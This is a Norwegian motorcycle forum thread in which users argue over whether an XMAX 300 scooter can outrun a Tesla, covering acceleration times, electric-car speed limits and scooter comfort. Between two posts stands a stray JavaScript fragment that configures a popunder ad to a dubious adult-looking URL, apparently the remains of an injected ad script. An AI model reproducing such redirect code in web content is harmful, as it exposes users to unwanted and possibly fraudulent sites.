Fin til langtur - hvilken sykkel er det?

Generelt om MC, nyheter, hendelser, film & bilder, MC i media, kjøreopplæring osv.
Svar
Brukeravatar
Bjerknez
Innlegg: 22867
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Fin til langtur - hvilken sykkel er det?

Legg inn av Bjerknez »

FreewheelBurning skrev: 19 okt 2020, 15:02 Jeg skulle ut på motorveien forrige uke, med en tesla bak. Den akselererte raskere enn mine 28 eselkrefter klarte, så den kjørte ut på siden (venstre feldt). Men det varte ikke mange nok sekunder til at vi begge nådde fartsgrensen (toppfart), og ble liggende ved siden av hverandre et stykke videre. Dette er en av få ganger jeg blir forbikjørt av bil, det er nesten alltid motsatt. Hvis jeg hadde hatt en raskere scooter (c650, t-max, burgman 650 eller forza 750) hadde jeg rivd ifra uten problemer.

Dette er en av få tilfeller jeg merker at en 300cc motor kommer til kort. Et annet tilfelle er danske motorveier, der bånn gass ikke er nok til å pålitelig kunne kjøre forbi alle biler.
Her bommer du veldig. En Tesla hadde gruset scooteren din både i toppfart og aksellerasjon. Teslaen gjør 0-100 på rundt 3-4 sekunder. Det gjør IKKE scooteren din. Toppfarten på Tesla er nok også langt høyere.

Tror nok ikke han/hun i Teslaen prøvde å kjøre om kapp med deg over hodet. Selv JEG hadde slitt litt med å holde følge med en Tesla fra 0-100 med min S1000R. Vertfall opp til 100km/t. Derfra hadde jeg nok tatt den, men noen lett oppgave hadde det ikke vært.

Du hadde aldri "rivd i fra" en Tesla med en scooter. Uansett kubikk.

Jeg tviler også på om du hadde klart og holde følge med vår E-Golf opp til 80km/t. Jeg tviler og jeg tør til og med og vedde penger på at du hadde tapt. Nå er toppfarten på E-Golf 140km/t så der hadde du trolig tatt meg dog. Nye el_biler i dag er overraskende friske i frasparket. Aksellerasjonen er faktisk ganske bra. Men el-biler har ikke noe å stille opp med når man nærmer seg toppfarten som ofte er sperret på rundt 140km/t. Sikkert for å ikke overbelaste batteriet. Tesla har nok ikke den sperren. Hvorfor vet jeg ikke.

FreewheelBurning
Innlegg: 482
Registrert: 22 feb 2019, 23:21
Motorsykkelen din: XMAX 300

Re: Fin til langtur - hvilken sykkel er det?

Legg inn av FreewheelBurning »

Mellomtung har knapt toppfart på 140. Kanskje over det i medvind og slak nedoverbakke. For ordens skyld, jeg prøvde heller ikke kjøre omkapp, jeg kjørte bare bånn gass opp til fartsgrensen da det var klar bane fremover.

Brukeravatar
Bjerknez
Innlegg: 22867
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Fin til langtur - hvilken sykkel er det?

Legg inn av Bjerknez »

Jeg forstår derimot at du er fornøyd med scooteren din. Det er veldig bra. Det er den første to-hjulingen hvis jeg ikke har missforstått? Har du kjørt andre sykler? Har du kjørt en Tesla?

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}

Brukeravatar
niko
Innlegg: 1149
Registrert: 03 sep 2017, 00:00
Motorsykkelen din: Yamaha TDM 900 2006
Sted: Oslo

Re: Fin til langtur - hvilken sykkel er det?

Legg inn av niko »

Tesla S 250 km/t. I følge en kompis som har en. Han har ikke testa om det stemmer. Sier han i hvert fall :-)

FreewheelBurning
Innlegg: 482
Registrert: 22 feb 2019, 23:21
Motorsykkelen din: XMAX 300

Re: Fin til langtur - hvilken sykkel er det?

Legg inn av FreewheelBurning »

Juicebox skrev: 19 okt 2020, 15:33 Tviler. Jeg tror virkelig ikke at du har forståelse på fart, heller ikke hvor kvikk Teslaene er, uansett modell.

Jeg er glad du har det bra med scooteren din ihvertfall!
Det som er fakta er at vi endte opp side ved side da begge nådde fartsgrensen på motorveien. Kan godt hende teslaen kunne kjørt forbi meg eller kjørt forbi meg raskere, men den gjorde ikke det. Det endte med at jeg lot den kjøre forbi fordi det var kaldt og det er en del UP på den strekningen og jeg hadde ikke hastverk. Kan legge til at jeg hadde et par sekunders forsprang da jeg lå først.
Sist redigert av FreewheelBurning den 19 okt 2020, 16:07, redigert 1 gang totalt.

FreewheelBurning
Innlegg: 482
Registrert: 22 feb 2019, 23:21
Motorsykkelen din: XMAX 300

Re: Fin til langtur - hvilken sykkel er det?

Legg inn av FreewheelBurning »

Bjerknez skrev: 19 okt 2020, 15:57 Jeg forstår derimot at du er fornøyd med scooteren din. Det er veldig bra. Det er den første to-hjulingen hvis jeg ikke har missforstått? Har du kjørt andre sykler? Har du kjørt en Tesla?
Jeg har kjørt en tung mc på kjøreskolen, har ikke peiling hva slags type det var, annet enn at den var gul.

Anngående videoen så bør det brukes GPS for å måle farten fordi det er svært mange som rapporterer at den viser opptil 10% for høy hastighet. Så 140 indikert kan fort vise seg å være 126 i virkeligheten. Har selv klart å få den opp i 160 på displayet, men det var kanskje ikke mer enn 145 i virkeligheten. Det var i Danmark bare så det er sagt, så en forholdsvis liten fartsovertredelse da fartsgrensen er høyere der.

Brukeravatar
Juicebox
Innlegg: 849
Registrert: 11 mai 2015, 23:46
Motorsykkelen din: -

Re: Fin til langtur - hvilken sykkel er det?

Legg inn av Juicebox »

Nei nå må du slutte å trolle oss med scooteren din, for det begynner å ikke bli morsomt lenger. Jeg starter å tro at du virkelig mener scooteren din er all that.

FreewheelBurning
Innlegg: 482
Registrert: 22 feb 2019, 23:21
Motorsykkelen din: XMAX 300

Re: Fin til langtur - hvilken sykkel er det?

Legg inn av FreewheelBurning »

Det er ikke relevant til denne diskusjonen, så jeg kan godt gi meg. I bunn og grunn kan det med norske forhold på asfalt bunne ned i 0-100, om det er tesla på 3 sekunder, en gjennomsnitlig motorsykkel på... 5 sekunder? Eller en mellomtung på kanskje 10-11 sekunder. Å snakke om moped eller lett mc blir ikke relevant da de knapt når opp.

Norsense
Innlegg: 83
Registrert: 12 des 2019, 08:51
Motorsykkelen din: For tiden uten.
Sted: Arendal

Re: Fin til langtur - hvilken sykkel er det?

Legg inn av Norsense »

En mellomtung kan ha 35 kw, om den ikke er for lett. Da skal fører være ganske tung og klønete for å komme opp i 10-11 sekunders 0-100 tid.

Brukeravatar
Juicebox
Innlegg: 849
Registrert: 11 mai 2015, 23:46
Motorsykkelen din: -

Re: Fin til langtur - hvilken sykkel er det?

Legg inn av Juicebox »

Det er flere ganger jeg tenker: What? Hva snakker han karen her om? Troller han eller? Er du serr? Det er en scooter!!?

Ikke for å være nedlatende eller belærende, men ta å prøvekjør andre biler og sykler. Kjenn hvor raskere det faktisk er når et kjøretøy er 1 sekund raskere enn et annet. Opplev komforten med større hjul enn miniscooterhjulene du kjører på. Føl den indre roen med lavt turtall i 100kmt kontra din som jeg tipper blir ganske høyt og slitsomt. Våg og test noe annet og ikke bare les og stol blindt på det som står på nettet

FreewheelBurning
Innlegg: 482
Registrert: 22 feb 2019, 23:21
Motorsykkelen din: XMAX 300

Re: Fin til langtur - hvilken sykkel er det?

Legg inn av FreewheelBurning »

Jeg tenker vel mye av det samme som du nevner når jeg leser det motsatte... men jeg holder meg for god til å anklage andre for å trolle.

Brukeravatar
Juicebox
Innlegg: 849
Registrert: 11 mai 2015, 23:46
Motorsykkelen din: -

Re: Fin til langtur - hvilken sykkel er det?

Legg inn av Juicebox »

FreewheelBurning skrev: 19 okt 2020, 17:24 Jeg tenker vel mye av det samme som du nevner når jeg leser det motsatte... men jeg holder meg for god til å anklage andre for å trolle.
Haha! Gud velsigne deg og scooteren din :)

Brukeravatar
pekle
Innlegg: 650
Registrert: 19 aug 2018, 19:18
Motorsykkelen din: No FUD

Re: Fin til langtur - hvilken sykkel er det?

Legg inn av pekle »

Bjerknez skrev: 19 okt 2020, 15:46 Men el-biler har ikke noe å stille opp med når man nærmer seg toppfarten som ofte er sperret på rundt 140km/t. Sikkert for å ikke overbelaste batteriet. Tesla har nok ikke den sperren. Hvorfor vet jeg ikke.
En typisk Model S har 2,5-3 ganger så stor batterikapasitet som f.eks en eGolf. Ettersom batteriene er bygd opp av masse små celler blir belastningen per celle likevel sammenlignbar. Derfor kan Tesla (og Audi/Jaguar/Polestar/Porsche...) ta ut både høyere toppeffekt og høyere effekt over tid. Men tidlige Model S hadde forsåvidt problemer med overoppheting ved langvarig hard kjøring. Og så er det selvsagt markedsføring og posisjonering inne i bildet. F.eks har jo Volvo innført toppfart på 180 på alle sine biler av sikkerhetshensyn. Men Polestar (som er eid av Volvo/Geely) har ikke den begrensningen, da de sikter mot et mer sportslig image.

Og selv om Tesla ikke sperrer før 250, så er den ikke så overvettes rask oppe i fart. En S1000R klarer nok greit å holde unna der. Det har sammenheng med at Tesla har bare en utveksling. Porsche har valgt å ha to gir på Taycan, så den er kvikkere i høye hastighetsområder (og funker trolig bedre på Autobahn)

Beklager OT :-# :x

Brukeravatar
Bjerknez
Innlegg: 22867
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Fin til langtur - hvilken sykkel er det?

Legg inn av Bjerknez »

Juicebox skrev: 19 okt 2020, 16:05 Nei nå må du slutte å trolle oss med scooteren din, for det begynner å ikke bli morsomt lenger. Jeg starter å tro at du virkelig mener scooteren din er all that.
De aller fleste tunge motorsykler fra 600cc og oppover gjør 0-100 på rundt 5 sekunder eller bedre. Min gjør 0-100 (i følge internettet) på rundt 2.7 sekunder med en dreven sjåfør. De fleste syklene i 1000 klassen bortsett fra cruisere gjør 0-100 på rundt 3 sekunder. Scooteren din ser ut til i følge videoen å gjøre denne øvelsen på rundt 8-9 sekunder. Altså som en gjenomsnittlig bil i dag med repsekt for seg selv.

En Tesla hadde du ikke hatt nubbesjans til å kjøre i fra. En Tesla kunne kjørt rundt deg med en hånd på rattet. Det henger rett og slett ikke på greip det du sier her. Faktsik har du ikke nubbesjans med mange andre biler heller.

Jeg synes det er artig med diskusjon rundt sykler og valg av dette, og det viktigste er uansett at man er fornøyd selv. Det finnes ikke annet jeg driter mer i enn hva andre kjører av sykkel, selv ok det er artig å diskutere litt til tider.

Men det du skriver om scooteren din stemmer bare ikke. Den er ikke rask, små hjul gir dårligere komfort da hjulene følger humpene i veien lettere enn større hjul. At man sitter godt på en scooter er en smakssak, men for meg ble det som å sitte på en benk, med knærne oppunder albuene. Det eneste jeg kanskje misunner deg er at du har plass til hjelmen under salen. Det er vel det eneste positive jeg har å si.

Kos deg på cruiseren din. Møtes vi en dag så kan vi ta en kaffe og kanskje kan du få prøve min sykkel. Det var nemlig det jeg gjorde. Jeg var uberstolt av min Street Triple R, helt til jeg prøvekjørte en S1000R. Året etter hadde jeg en slik..... å slik går no dagan :)

Lyden på scooteren var fraværende og kjedelig, de små hjulene fant alle dumpene i veien, sittestillingen var bare helt feil, vindskjermen var livsfarllig på E6 i 120 km/t. Voldsom turbulens. Automat kombinert med bred kåpe som gjør at det blir unaturlig å sette beina rett ned på bakken gjør krypkjøring til et mareritt (i forhold til en vanlig motorsykkel med gir). Motorkraften er fraværende og jeg følte den gikk som en hvilket som helst bil. Vertfall opp til rundt 100kmt. Over det var den bare slitsom, mest med tanke på turbulensen. Og de små hjulene.

Men hadde jeg klart å kjøre til Tromsø og tilbake med en slik? Selvsagt. :)

Brukeravatar
Bjerknez
Innlegg: 22867
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Fin til langtur - hvilken sykkel er det?

Legg inn av Bjerknez »

Siterte feil person over, men det skjønner dere sikkert :redface

Svar